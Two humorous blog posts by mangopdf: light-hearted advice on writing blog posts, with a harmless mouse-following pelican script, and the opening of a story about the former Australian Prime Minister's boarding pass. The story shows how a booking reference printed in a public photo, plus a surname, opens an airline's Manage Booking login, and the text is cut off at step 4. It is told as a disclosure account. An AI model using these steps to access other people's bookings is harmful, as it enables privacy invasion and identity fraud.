<p><strong>I give you feedback on your blog post draft but you don’t send it to me</strong> (mangopdf, 2021-08-20)</p>
<p>You have opened the Post Editor, and found within yourself the courage to type Content. Critically, you have yet to click “Publish”.</p>
<p>This is the moment where a lot of people go horribly, irrecoverably wrong.</p>
<p>Yes I absolutely will review your draft, and do not even worry about sending it to me. I just end up saying the same things to everyone anyway, so that simply will not be necessary.</p>
<p>So yeah it looked pretty good. Definitely got words in it. Loved the bit about Galileo. You could probably just publish it and it would be fine.</p>
<p>But what if you don’t want <em>fine</em>?</p>
<p>What if you want it <em>all</em>?</p>
<hr />
<h1 id="professor-mangopdfs-grand-unified-theory-of-blogging">Professor mangopdf’s Grand Unified Theory of Blogging</h1>
<p>Some people’s Grand Unified Theory of Blogging is all like:</p>
<ol>
<li>It has a clickbait title</li>
<li>It’s long enough</li>
<li>💯 Publish 💯</li>
</ol>
<p>Yes thank you, very cool. But what about</p>
<p><img src="/img/howtoblog/grand_unified_theory.png" alt="The 3 steps" /></p>
<p>Do you see the order here? Steps 1 and 2?</p>
<p>You can write a <em>really</em> good blog post with just steps 1 and 2. Actually writing about the topic you’re supposed to be writing about is strictly optional.</p>
<p>But if you leave out the first 2 steps, it <em>doesn’t matter</em> what you’re trying to say.</p>
<p>You clowns are out there trying to tell people</p>
<blockquote>
<p><em>“I discovered bees can talk but unfortunately they are racist”</em></p>
</blockquote>
<p>But everyone stopped reading 3 sentences in because it started out all like</p>
<blockquote>
<p><em>honey gets delivered to the supermarket on Fridays, because the drivers have the weekends off, and the supermarkets aren’t open to accept deliveries on Thursdays</em>….</p>
</blockquote>
<p>And so on, and so forth, until the bees <strong>get away with it</strong>.</p>
<hr />
<h1 id="part-1-people-pay-attention-to-what-youre-saying">Part 1: People pay attention to what you’re saying</h1>
<p>You simply wanna make it easy for people to give your post the maximum volume of 👀 eyes emoji 👀</p>
<h2 id="the-title-gets-read-way-more-than-the-rest-so-make-it-count">The title gets read <em>way</em> more than the rest, so make it count</h2>
<p><img src="/img/howtoblog/title_icon.png" alt="The title-tiny" /></p>
<p>I dunno about you, but I vaguely read the titles of like 98 things before I click on one. Statistically, your blog post is one of those 98 things, so you <em>better</em> make each character count.</p>
<h3 id="what-should-the-title-look-like">What should the title look like?</h3>
<p>yes yes yes:</p>
<blockquote>
<p>I discovered bees can talk but unfortunately they are racist</p>
</blockquote>
<p>i’m begging you not to do this:</p>
<blockquote>
<p>It’s not just Barry from Bee Movie who might have a secret</p>
</blockquote>
<p>The title should represent the post as much as possible. It should prepare the reader emotionally for the clown carnival ride you are about to take them on.</p>
<p>It should be the <em>opposite</em> of clickbait.</p>
<p>You’ve been hurt so many times before, you brave and vulnerable internet traveller, you. Desperate for #content, asking yourself whether <em>this</em> top 10 article is the one that will finally win her back? I mean hey 10 is a lot of things, so surely your fulfilment lies within one of them.</p>
<p>Clickbait titles burned down my entire village and never text unless they want something. For 💲some reason💲 people keep writing them, though. So now when you look at headlines, you just have to guess what they’re about, like a caveman. A caveman scrolling clickbait titles. Listen, I dunno.</p>
<h3 id="how-about-i-title-it-x-for-fun-and-profit">How about I title it “X for fun and profit?”</h3>
<p>no</p>
<h2 id="listen-i-think-you-should-use-way-more-headings-im-talkin-a-lot">Listen. I think you should use <em>way</em> more headings. I’m talkin’ <em>a lot</em></h2>
<p>I don’t know about you, but when I read something I scroll around all over the place like a functional adult. If you have a lot of headings that describe the words under them, then other adults can stop scrolling and read a paragraph when they see a heading they like.</p>
<p>Paragraphs do a similar thing, but within each heading, letting the reader skip around even more, and we love that for them<sup id="fnref:onesentence" role="doc-noteref"><a href="#fn:onesentence" class="footnote" rel="footnote">1</a></sup>.</p>
<p>Basically, if your reader sees a wall of text, their brain will activate the evolutionary survival mechanism they have developed to <em>instantly</em> panic-close that tab, before the wall of text jumps out of the page and hecking eats them.</p>
<p><img src="/img/howtoblog/wall_of_text.png" alt="A wall of text-small" />
<em>Absolutely no way anyone’s reading this</em></p>
<h3 id="actually-write-the-headings-first">Actually, write the headings first</h3>
<p>This might just be a me thing, but it would be <em>very</em> brave of me to just log on and type. Writing out the headings lets you see if your sections flow on naturally to each other, or if anything’s missing, or if now that you’ve laid the whole thing out before you, this blog post was a mistake, for example.</p>
<h4 id="engage-in-subheadings">Engage in subheadings</h4>
<p>You don’t gotta stop at one heading, you can just keep going and going. And that? That’s value my friend.</p>
<h5 id="dont-go-too-hard">Don’t go too hard</h5>
<p>this is degeneracy</p>
<h2 id="you-gotta-make-the-post-interesting-enough-or-people-will-just-get-bored-and-leave">You gotta make the post interesting enough, or people will just get bored and leave?</h2>
<p>You know how you put all that effort into typing those words? What if someone just… didn’t read them? 😬 They can do that, you know. There’s nothing in the rules against it.</p>
<p>The days of having no choice but to read incredibly boring school textbooks to find the information you need to do this hecking history exam are over. You need not hold your reader hostage with boring and irrelevant details, as your textbooks did to you.</p>
<p>You can use uh blogging to break this vicious cycle and usher humanity into a golden age of Content. Nay, you must.</p>
<h3 id="oh-i-get-it-i-should-slap-a-tangentially-relevant-top-text-bottom-text-meme-every-few-paragraphs-and-call-it-a-day">“Oh, <em>I</em> get it, I should slap a tangentially relevant top text bottom text meme every few paragraphs and call it a day”</h3>
<p><img src="/img/howtoblog/bottomtext.jpg" alt="what the heck did you just bottom text-small" /></p>
<h3 id="keep-it-interesting-by-anticipating-what-the-reader-wants">Keep it interesting by anticipating what the reader wants</h3>
<p>What are they here for? It sure ain’t top text bottom text, I’ll tell ya that for free. It depends on what your post is trying to do. You wanna make the ideas flow on naturally from each other, so there’s no time to get bored and leave. For example:</p>
<h4 id="telling-a-story">Telling a story</h4>
<ol>
<li>Who is it about?</li>
<li>What happened to them?</li>
<li>How did they feel about that?</li>
</ol>
<h4 id="arguing-an-idea">Arguing an idea</h4>
<ol>
<li>What’s the problem with how things are?</li>
<li>What is the idea?</li>
<li>How does the idea solve the problem?</li>
</ol>
<h4 id="teaching-how-to-do-something-eg-blog-post-">Teaching how to do something (e.g. blog post 👀)</h4>
<ol>
<li>Tell the reader they’re a clown</li>
<li>Tell them bees are racist</li>
</ol>
<h3 id="classic-mistake-writing-about-what-you-find-interesting">Classic mistake: Writing about what <em>you</em> find interesting</h3>
<p>You already know that QPU movement takes a lot of speed, and it’s <em>incredible</em> that there’s a slope that’s <em>just right</em> for Mario to walk up it for 12 hours building up speed.</p>
<p>But unless your audience is in <em>exactly</em> the right niche, they don’t know what the <a href="https://www.youtube.com/watch?v=kpk2tdsPh0A">heck</a> you’re talking about, so they just shrug and don’t read it<sup id="fnref:exception" role="doc-noteref"><a href="#fn:exception" class="footnote" rel="footnote">2</a></sup>.</p>
<hr />
<p><br />
<br /></p>
<h1 id="part-2-people-understand-what-youre-saying">Part 2: People understand what you’re saying</h1>
<p>Somehow you have made it to the point where people are <em>reading</em> your words. This is most of the hard work honestly, you can take it easy from here except that <code class="language-plaintext highlighter-rouge">h a h a</code> no you can’t. That would risk being inaccessible on main, you see.</p>
<p>You have an idea in your head. <em>You</em> know what you mean with beautiful crystal clarity. But it sucks because you have to get that idea into someone <em>else’s</em> head. And the worst part is you have to use <em>words</em> to do it? Buddy, I know how ya feel.</p>
<h2 id="constantly-ask-yourself-does-the-person-reading-this-know-what-the-heck-im-talking-about">Constantly ask yourself: <em>Does</em> the person reading this know what the heck I’m talking about?</h2>
<p>This is the most common thing I say, possibly ever, but definitely when reviewing people’s blog posts.</p>
<p>Obviously, you would not write something that you don’t understand<sup id="fnref:atme" role="doc-noteref"><a href="#fn:atme" class="footnote" rel="footnote">3</a></sup>. But what about the person you want to read it? They don’t know everything you know. So you gotta be reeeeeally careful not to accidentally assume your words make sense without the context in your brain.</p>
<h2 id="cut-out-the-jargon">Cut out the jargon</h2>
<p><img src="/img/howtoblog/best_practices.png" alt="image" /></p>
<p>Imagine reading</p>
<blockquote>
<p>Cached ITS has revolutionised attribution for resources in the Post-Contact era.</p>
</blockquote>
<p>Don’t worry, I just made this one up. There’s nobody out there actually writing this. But do you see how it makes <em>no sense</em>? That’s how you sound to people if you use words they don’t know.</p>
<p>Maybe buzzwords are safe though? No, I’m coming for them too. Buzzwords, if I have understood the meaning correctly, are “words that nobody understands but everyone thinks it’s good to say”. Artificial, and, I cannot stress this enough, Intelligence.</p>
<p>If your post’s audience don’t know the word? You are simply <em>banned</em> from writing it<sup id="fnref:explain" role="doc-noteref"><a href="#fn:explain" class="footnote" rel="footnote">4</a></sup>.</p>
<h3 id="cota">COTA</h3>
<p>(Cut out the acronyms)</p>
<p>I’m so sorry for doing that to you<sup id="fnref:main" role="doc-noteref"><a href="#fn:main" class="footnote" rel="footnote">5</a></sup>, but you had to <em>feel</em> how painful it is when someone point-blank blunders an acronym you don’t know into a heading.</p>
<p>Either expand the acronym the first time you use it, or simply remove it entirely? Can you just explain the concept, rather than using the shorthand or jargon for it?</p>
<p>You don’t have to say “cached”, you can say “saved for later”. You don’t have to say “powered by machine learning”, you can just say “please buy it i’m begging u we rly need a win”. You can just <em>do</em> that, and nobody will stop you<sup id="fnref:bravery" role="doc-noteref"><a href="#fn:bravery" class="footnote" rel="footnote">6</a></sup>.</p>
<h2 id="basically-take-any-excuse-to-use-a-picturediagram-instead-of-words">Basically take any excuse to use a picture/diagram instead of words</h2>
<p>Listen, sometimes it is too hard to explain where New Zealand is over text. “What? But it’s a small country with a vibrant honey economy, located just off the east coast of Austr-”. Stop this madness. What is an “east coast”? How far “off” is it? Does that mean an ocean is involved? What is a “country”? We do not know what this means.</p>
<p>You know what we <em>do</em> understand?</p>
<p><img src="/img/howtoblog/nz.png" alt="New Zealand|small" />
<span></span></p>
<p>We live in a world of rich media where you can probably embed a <a href="#pelicantime">talking pelican that follows the mouse around the screen and gives tax advice</a><sup id="fnref:rattles" role="doc-noteref"><a href="#fn:rattles" class="footnote" rel="footnote">7</a></sup> in your post, to say nothing of a picture.</p>
<div class="pelican-time">
<style>
.pelican-time {
position: fixed;
top: 0;
left: 0;
display: none;
}
.speech-bubble {
font-family: "Comic Sans MS", "Comic Sans", cursive;
display: none;
}
.tax-advice {
position: absolute;
max-width: 175px;
/* when ur a top */
top: 22%;
/* when ur a leftist*/
left: 81%;
transform: translate(-50%, -50%);
font-size: 12pt;
line-height: normal;
color: black;
text-align: center;
}
.pelican-image {
padding-top: 75px;
padding-left: 50px;
}
</style>
<div class="pelican">
<div class="row">
<div class="column">
<div class="pelican-image">
<img src="/img/howtoblog/pelican/pelican_NO_MALWARE.gif" />
</div>
</div>
<div class="column">
<div class="speech-bubble">
<img src="/img/howtoblog/pelican/CLOUDBUBBLE.png" width="200" height="150" />
<div class="tax-advice">
TAX ADVICE <br /> OK? LOREM <br /> IPSUM?
</div>
</div>
</div>
</div>
<script type="text/javascript">
// The pelican follows the mouse around the viewport. `$` is jQuery, which the page loads elsewhere.
const pelican = document.querySelector('.pelican');
pelican.style.transform = `translateX(${400}px)`;
window.addEventListener('mousemove', (evt) => {
var rect = pelican.getBoundingClientRect();
const x = evt.clientX - 400;
const y = Math.max(evt.clientY, 0);
const xLimit = 0;
const yLimit = $(window).height() - rect.height;
//if not out of bounds, move both axis!
if (x>0 && y<yLimit) {
pelican.style.transform = `translateX(${x}px) translateY(${y}px)`;
}
// if up against a wall (wink), only move y axis
if (x<0) {
pelican.style.transform = `translateX(${xLimit}px) translateY(${y}px)`;
}
//if squashed below, only move x axis
if (y>yLimit) {
pelican.style.transform = `translateX(${x}px) translateY(${yLimit}px)`;
}
//if in the corner, stay in corner
if (y>yLimit && x<0) {
pelican.style.transform = `translateX(${xLimit}px) translateY(${yLimit}px)`;
}
});
const speechBubble = document.getElementsByClassName('speech-bubble')[0];
const taxAdvice = document.getElementsByClassName('tax-advice')[0];
//WAIT FUNCTIONS: bubble hidden for 3 seconds, then shown with fresh advice for 4 seconds, forever
function dontSpeak() {
speechBubble.style.display = "none";
setTimeout(speak, 3000);
}
function speak() {
chooseRandomTaxAdvice();
speechBubble.style.display = "block";
setTimeout(dontSpeak, 4000);
}
var arr = ["PAY UR TAXES ON TIME",
"Lodge by October 31 (In Aus)",
"Check your eligibility for deductions",
"Get help from a registered tax agent",
"Buy Low, Sell High",
"Fish are my income!",
"Chippies are my income!",
"Continue Avoiding Debt Collectors!",
"*Pelican noises*",
"Claim work-related expenses"];
// random float in [mn, mx)
function random(mn, mx) {
return Math.random() * (mx - mn) + mn;
}
// floor of a value in [0, arr.length) hits every index, including the last one
function chooseRandomTaxAdvice() {
taxAdvice.textContent = arr[Math.floor(random(0, arr.length))];
}
//TAX ADVICE:
dontSpeak();
document.querySelector("a[href='#pelicantime']").addEventListener('click', () => {
const pelicanTime = $('.pelican-time');
pelicanTime.toggle();
});
</script>
</div>
</div>
<h2 id="use-more-examples-im-talkin-wayyyyyyy-more">Use more examples. I’m talkin’ wayyyyyyy more</h2>
<p>Hey, does this help you understand what a preposition is?</p>
<blockquote>
<p>A preposition is a word or group of words used before a noun, pronoun, or noun phrase to show direction, time, place, location, spatial relationships, or to introduce an object.</p>
</blockquote>
<p>No, this is what a Terms of Service page would say if they could talk and also we let them write blog posts.</p>
<p>How about:</p>
<blockquote>
<p>Prepositions are words like “on,” “in,” “under,” and “beside,”. For example, “The ravioli is <strong>in</strong> the briefcase <strong>behind</strong> you.”</p>
</blockquote>
<p>Yes 👏 KING that’s the 👏 stuff 👏 right there.</p>
<h2 id="put-a-summary-at-the-top-maybe">Put a summary at the top maybe?</h2>
<p><img src="/img/howtoblog/tldr_icon.png" alt="Summary Icon|tiny" />
<span id="tell-nobody-what-u-saw"></span></p>
<p>You wanna let the reader quickly decide whether to read your post or not. Maybe they get what they wanted <em>just</em> from the summary, and can just stop reading there, <em>instantly</em> winning you a Nobel Peace Prize but for like, blogging.</p>
<p>In the first few sentences, you want the reader to know:</p>
<ul>
<li>Who is this for?</li>
<li>What’s going to happen?</li>
</ul>
<h2 id="get-to-the-point">Get to the point</h2>
<p>If you want to say</p>
<blockquote>
<p>“Get someone to review your blog post before you publish it.”</p>
</blockquote>
<p>Then you can just <em>say</em> that<sup id="fnref:trouble" role="doc-noteref"><a href="#fn:trouble" class="footnote" rel="footnote">8</a></sup>.</p>
<p>You don’t have to first say:</p>
<blockquote>
<p>“It’s best practice to consider different perspectives. A review by an independent third party can lead to increased success.”</p>
</blockquote>
<p>What are you trying to <em>tell</em> me? It’s so vague it could mean anything. Who <em>talks</em> like that? When is this post going to get to the bit where we <a href="https://mango.pdf.zone/finding-former-australian-prime-minister-tony-abbotts-passport-number-on-instagram">steal the Prime Minister’s identity on main</a>? One day a long time ago, I guess someone decided you look fancy if you write so vaguely you’re hard to understand. “Maybe they’ll think I’m hard to understand because I’m so <em>smart</em>”, they thought, with their perfectly smooth and spherical brain.</p>
<h2 id="what-if-you-just-wrote-more-like-how-you-talked">What if you just wrote more like how you talked?</h2>
<p>Bit controversial, but you know how listening to someone explain something usually makes <em>sense</em><sup id="fnref:well" role="doc-noteref"><a href="#fn:well" class="footnote" rel="footnote">9</a></sup>? It’s a lot harder to be completely incoherent when you’re talking, because you can hear yourself. But writing? You can casually write “thusly, delivering more impact” like a serial LinkedIn poster without even noticing. You monster.</p>
<p>So sometimes I try saying what I want to say out loud to myself, alone in my room like a serial LinkedIn poster. Buuuut it often reads better than whatever I had before, thusly delivering more impact.</p>
<h3 id="write-it-like-youre-trying-to-trick-the-reader-into-understanding-what-you-mean-in-as-few-words-as-possible">Write it like you’re trying to trick the reader into understanding what you mean in as few words as possible</h3>
<p>Because you are.</p>
<hr />
<h2 id="you-gotta-edit-at-least-once">You <em>gotta</em> edit at least once</h2>
<p>What, you think you’re just going to sit down and type the whole thing in one go, fearlessly hitting “Post” as you type the last full stop? What about the <code class="language-plaintext highlighter-rouge">consequences</code> of your <code class="language-plaintext highlighter-rouge">earlier actions</code>???</p>
<h3 id="cut-bits-out-ruthlessly">Cut bits out ruthlessly</h3>
<p><img src="/img/howtoblog/cut_out_icon.png" alt="Cut bits out|tiny" /></p>
<p>You can cut out <em>so much</em> by simply realising “actually, the reader doesn’t care about that.” <em>Simply</em> delete it, and the post loses nothing, so the overall quality goes up. That’s just economics.</p>
<h3 id="get-someone-to-review-it">Get someone to review it</h3>
<p>Get a <em>lot</em> of someones to review it<sup id="fnref:irony" role="doc-noteref"><a href="#fn:irony" class="footnote" rel="footnote">10</a></sup>. You know how when you try on clothes, you get someone else’s opinion before you buy it? How bout you see if your post makes sense before you…. wear it? I’m sorry.</p>
<p>I usually ask reviewers to point out anything:</p>
<ul>
<li>Hard to understand</li>
<li>Wrong</li>
<li>Not necessary</li>
<li>That doesn’t flow on naturally from the previous bit</li>
</ul>
<p>This process is a <em>lot</em> easier if you use something that lets people highlight text and comment on it, like <a href="https://docs.google.com">Google Docs</a>, but you can continue to email <code class="language-plaintext highlighter-rouge">my Blog post (fixed version) (updated) FINAL__FINALFINAL (1).docx</code> or do it in the TikTok comments if you must.</p>
<hr />
<p>Okay that was the hard part. People are now reading your post, and understanding what you mean, which means you’ve achieved blogging supremacy. You could probably blog down everything in a 2km radius<sup id="fnref:miles" role="doc-noteref"><a href="#fn:miles" class="footnote" rel="footnote">11</a></sup> from here. If you <em>want</em> you can keep going, but honestly you could just hit “Publish” here and probably nobody would notice.</p>
<h1 id="part-3-you-say-the-thing">Part 3: You say the thing</h1>
<p>No that’s it, this part is all you.</p>
<p><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></p>
<hr />
<h1 id="post-credits-cutscene-but-how-do-i-decide-what-to-write-about">Post-credits cutscene: But how do I decide <em>what</em> to write about?</h1>
<p>Oh,,,,, hello. You’re still here? Well….. I suppose we could get,,, <code class="language-plaintext highlighter-rouge">p h i l o s o p h i c a l</code></p>
<h2 id="who-is-the-audience">Who is the audience?</h2>
<p>Just by asking this question you have already galaxy brained past many, many bland and tasteless blog posts.</p>
<p>If you are writing something for the audience of “anyone”, you aren’t allowed to assume anything about them.</p>
<p>For example, the wide-ranging “anyone” audience includes toddlers who cannot read, or use a spoon correctly. They will not know what the acronym “FOI” stands for, because they’re still working on the idea of letters.</p>
<p>But if your audience is like, “Big Honey”, or “people who have sinned once and want to know more”, or “the group chat”, you <em>can</em> make some assumptions. You can say why they might want to read your post in the first place<sup id="fnref:giving" role="doc-noteref"><a href="#fn:giving" class="footnote" rel="footnote">12</a></sup>.</p>
<h3 id="-good-reasons-to-post">✅ Good reasons to Post</h3>
<ul>
<li>You are the only person in the world with this information, and other people might want to know it (publishing something new)</li>
<li>Fanfic (any)</li>
<li>To share how to do something, so other people can learn it 👀</li>
<li>To tell a story</li>
<li>Just for fun, to be entertaining</li>
<li>To announce something your audience will be interested in</li>
</ul>
<h3 id="-bad-reasons-to-post">❎ Bad reasons to Post</h3>
<ul>
<li>Someone told you that you have to write about this</li>
<li>“For visibility”
<ul>
<li>What does that <em>mean</em>?</li>
<li>Is it visible if nobody reads it 🤔</li>
</ul>
</li>
<li>Need somewhere to remember all your passwords</li>
<li>To encourage people to buy your product
<ul>
<li>The post is now an ad</li>
<li>Who would read it on purpose?</li>
</ul>
</li>
<li>To document how something you made works
<ul>
<li>Might be better in <a href="https://docs.github.com/en/free-pro-team@latest/github/building-a-strong-community/about-wikis">wiki format</a>, with multiple pages linking to each other</li>
</ul>
</li>
</ul>
<h2 id="ask-yourself-why-are-you-doing-gestures-all-this">Ask yourself: <em>Why</em> are you doing *gestures* <em>all this</em>?</h2>
<p>Why are you here? What are you trying to do? What is it that you’re trying to make happen, using blogging as the metaphorical sparks with which to ignite the fuse of the bulk-discount fireworks of revolution?</p>
<p>It’s possible you can get incredible editorial value by simply realising you do not want to Post at all, or that you actually want to change what you’ve written completely. I rewrote more than half of this post, and it’s <em>still</em> got that bulk-discount fireworks bit in it.</p>
<hr />
<h2 id="the-conclusion">The conclusion</h2>
<p>Usually I just suddenly end by asking some dumb question then cutting off abruptly.</p>
<h2 id="like-what">Like what?</h2>
<p>gottem</p>
<hr />
<p><br />
<br />
<br />
<br /></p>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:onesentence" role="doc-endnote">
<p>It is absolutely okay to do the #journalism thing of having one sentence per paragraph, even if it looks jank at first. <a href="#fnref:onesentence" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:exception" role="doc-endnote">
<p>Of course, you can go <em>off</em> talking about something you find interesting, so long as you explain it in a way the audience can understand. You can use the Mario 0.5x A presses video as your guiding light, your North Star, if you will. <a href="#fnref:exception" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:atme" role="doc-endnote">
<p>don’t @ me <a href="#fnref:atme" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:explain" role="doc-endnote">
<p>Unless you explain it first, but even then… <a href="#fnref:explain" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:main" role="doc-endnote">
<p>and for being problematic on main. <a href="#fnref:main" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:bravery" role="doc-endnote">
<p>Of course, if you’re confident everyone reading your post will know those acronyms, or it doesn’t matter if they don’t know them, then be my guest. No, please. I simply insist. <a href="#fnref:bravery" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:rattles" role="doc-endnote">
<p>thank u <a href="https://open.spotify.com/artist/4YrZTJmrwvUhUWGAsohGgQ">rattlebones</a> for blessing us with this pelican. (sorry, u have to be using a mouse to read this for the <a href="https://nebula.wsimg.com/360920e58a126715c141a5d2230904e5?AccessKeyId=FD728A617B617E8917F9&disposition=0&alloworigin=1">pelican</a> to visit. think about it.) <a href="#fnref:rattles" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:trouble" role="doc-endnote">
<p>It’s okay. Anyone gives you trouble, tell ‘em I sent ya 😘 <a href="#fnref:trouble" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:well" role="doc-endnote">
<p>Welllllllll actually that’s a pretty big claim isn’t it. <a href="#fnref:well" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:irony" role="doc-endnote">
<p>yes thank you i do see the irony in this, no i will not be taking questions at this time <a href="#fnref:irony" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:miles" role="doc-endnote">
<p>This is about 60 degrees Fahrenheit, for all you Americans out there. <a href="#fnref:miles" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:giving" role="doc-endnote">
<p>Of course, I’m assuming you’re blogging because you’re <em>wanting</em> other people to read it. If you’re just writing it for you, go off king, you don’t need my unprompted journalism opinions. <a href="#fnref:giving" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>
<p><strong>When you browse Instagram and find former Australian Prime Minister Tony Abbott’s passport number</strong> (mangopdf, 2020-09-15)</p>
<p><img src="/img/sunburnt-country/title.png" alt="title image what's up twitter-large" /></p>
<h1 id="act-1-sunday-afternoon">Act 1: Sunday afternoon</h1>
<p>So you know when you’re flopping about at home, minding your own business, drinking from your water bottle in a way that does not possess <em>any</em> intent to subvert the Commonwealth of Australia?</p>
<p>It’s a feeling I know all too well, and in which I was vigorously partaking when I got this message in “the group chat”<sup id="fnref:groupchat" role="doc-noteref"><a href="#fn:groupchat" class="footnote" rel="footnote">1</a></sup>.</p>
<p><img src="/img/sunburnt-country/groupchat.png" alt="Can you hack this man?|medium" />
<em>A nice message from my friend, with a photo of a boarding pass 🙂 A good thing about messages from your friends is that they do not have any rippling consequences 🙂🙂🙂</em></p>
<p>The man in question is <a href="https://en.wikipedia.org/wiki/Tony_Abbott">Tony Abbott</a>, one of Australia’s <em>many</em> former Prime Ministers.</p>
<p><img src="/img/sunburnt-country/tony_abbott_wikipedia.png" alt="if u google tony abbott u get this|small" />
<em>That’s him, officer</em></p>
<p>For security reasons, we try to change our Prime Minister every six months, and to never use the same Prime Minister on multiple websites.<sup id="fnref:kevin07" role="doc-noteref"><a href="#fn:kevin07" class="footnote" rel="footnote">2</a></sup></p>
<h4 id="the-boarding-pass-photo">The boarding pass photo</h4>
<p>This particular former PM had just posted a picture of his boarding pass on Instagram (Instagram, in case you don’t know it, is an app you can open up on your phone any time to look at ads).</p>
<p><img src="/img/sunburnt-country/instagrampost.PNG" alt="Instagram post showing boarding pass|large" />
<em>The since-deleted Instagram post showing the boarding pass and baggage receipt. The caption reads “coming back home from japan 😍😍 looking forward to seeing everyone! climate change isn’t real 😌 ok byeee”</em></p>
<h4 id="can-you-hack-this-man">“Can you hack this man?”</h4>
<p>My friend<sup id="fnref:hoggemoade" role="doc-noteref"><a href="#fn:hoggemoade" class="footnote" rel="footnote">3</a></sup> (who we will refer to by their group chat name, 𝖍𝖔𝖌𝖌𝖊 𝖒𝖔𝖆𝖉𝖊) is asking<sup id="fnref:onbehalf" role="doc-noteref"><a href="#fn:onbehalf" class="footnote" rel="footnote">4</a></sup> whether I can “hack this man” not because I am the kind of person who regularly commits 𝒄𝒚𝒃𝒆𝒓 𝒕𝒓𝒆𝒂𝒔𝒐𝒏 on a whim, but because we’d recently been talking about boarding passes.</p>
<p>I’d said that people post pictures of their boarding passes all the time, not knowing that it can sometimes be used to get their passport number and stuff. They just post it being like “omg going on holidayyyy 😍😍😍”, unaware that they’re posting cringe.</p>
<p><img src="/img/sunburnt-country/instagramboardingpasses.png" alt="screenshot of #boardingpass on instagram|medium" />
<em>People post their boarding passes all the time, because it’s not clear that they’re meant to be secret</em></p>
<p>Meanwhile, some hacker is rubbing their hands together, being all “yumyum identity fraud 👀” in their dark web Discord, because this happens a <em>lot</em>.</p>
<p><img src="/img/sunburnt-country/boardingpassposts.png" alt="screenshot of #boardingpass on instagram" /></p>
<hr />
<p>So there I was, making intense and meaningful eye contact with this chat bubble, asking me if I could “hack this man”.</p>
<h3 id="surely-you-wouldnt">Surely you wouldn’t</h3>
<p>Of course, my friend wasn’t <em>actually</em> asking me to hack the former Prime Minister.</p>
<p><br />
<br />
<br />
<br />
<br /></p>
<p>However.</p>
<p><br />
<br />
<br />
<br />
<br />
<br /></p>
<p>You <em>gotta</em>.</p>
<p>I mean… what are you gonna do, <em>not</em> click it? Are you gonna let a <em>link</em> that’s like 50% advertising tracking ID tell you what to do? Wouldn’t you be <em>curious</em>?</p>
<p>The former Prime Minister had just posted his boarding pass. Was that <em>bad</em>? Was someone in danger? I didn’t know.</p>
<p>What I did know was: the <em>least</em> I could do<sup id="fnref:nocrime" role="doc-noteref"><a href="#fn:nocrime" class="footnote" rel="footnote">5</a></sup> for my country would be to have a casual browse 👀</p>
<h2 id="investigating-the-boarding-pass-photo">Investigating the boarding pass photo</h2>
<h3 id="step-1-hubris">Step 1: Hubris</h3>
<p>So I had a bit of a casual browse, and got the picture of the boarding pass, and then…. I didn’t know what was supposed to happen after that.</p>
<p>Well, I’d heard that it’s bad to post your boarding pass online, because if you do, a bored 17-year-old Russian boy called “Katie-senpai” might somehow use it to commit identity fraud. But I don’t know anyone like that, so I just clumsily googled some stuff.</p>
<h4 id="googling-how-2-hakc-boarding-pass">Googling how 2 hakc boarding pass</h4>
<p><img src="/img/sunburnt-country/uhhboardingpasshacking.png" alt="uhhh|small" /></p>
<p>Eventually I found <a href="https://null-byte.wonderhowto.com/how-to/hackers-use-hidden-data-airline-boarding-passes-hack-flights-0180728/">a blog post</a> explaining that yes, pictures of boarding passes can indeed be used for Crimes. The part you wanna be looking at for all your criming needs is the barcode, because it’s got the “Booking Reference” (e.g. <code class="language-plaintext highlighter-rouge">H8JA2A</code>) in it.</p>
<p>Why do you want the booking reference? It’s one of the two things you need to log in to the airline website to manage your flight.</p>
<p>The second one is your… last name. I was really hoping the second one would be like a password or something. But, no, it’s the booking reference the airline emails you and prints on your boarding pass. And it also lets you log in to the airline website?</p>
<p>That sounds suspiciously like a password to me, but like I’m still fine to pretend it’s not if you are.</p>
<h3 id="step-2-scan-the-barcode">Step 2: Scan the barcode</h3>
<p>I’ve been practicing every morning at sunrise, but still can’t scan barcodes with my eyes. I had to settle for a barcode scanner app on my phone, but when I tried to scan the picture in the Instagram post, it didn’t work :((</p>
<p><img src="/img/sunburnt-country/boardingpass.png" alt="the boarding pass photo" />
<em>Maybe I shouldn’t have blurred out the barcode first</em></p>
<h3 id="step-2-scan-the-barcode-but-more">Step 2: Scan the barcode, but more</h3>
<p>Well, maybe it wasn’t scanning because the picture was too blurry.</p>
<p>I spent around 15 minutes in an “enhance, ENHANCE” montage, fiddling around with the image, increasing the contrast, and so on. Despite the montage taking up way too much of the 22 minute episode, I couldn’t even get the barcode to scan<sup id="fnref:step3" role="doc-noteref"><a href="#fn:step3" class="footnote" rel="footnote">6</a></sup>.</p>
<h3 id="step-2-notice-that-the-booking-reference-is-printed-right-there-on-the-paper">Step 2: Notice that the Booking Reference is printed right there on the paper</h3>
<p>After staring at this image for 15 minutes, I noticed the Booking Reference is just… printed on the baggage receipt.</p>
<p>I graduated university.</p>
<p>But it did not prepare me for this.</p>
<p><img src="/img/sunburnt-country/bookingrefhighlighted.png" alt="Boarding pass with booking reference highlighted" />
<em>askdjhaflajkshdflkh</em></p>
<h3 id="step-3-visit-the-airlines-website">Step 3: Visit the airline’s website</h3>
<p><img src="/img/sunburnt-country/bookinglogin2.png" alt="Manage booking login screen with empty fields-large" /></p>
<p>After recovering from <em>that</em> emotional rollercoaster, I went to <a href="https://qantas.com.au">qantas.com.au</a>, and clicked “Manage Booking”. In case you don’t know it because you live in a country with fast internet, Qantas is the main airline here in Australia.</p>
<p>(I also very conveniently started recording my screen, which is gonna pay off <em>big time</em> in just a moment.)</p>
<h3 id="step-4-type-in-the-booking-reference">Step 4: Type in the Booking Reference</h3>
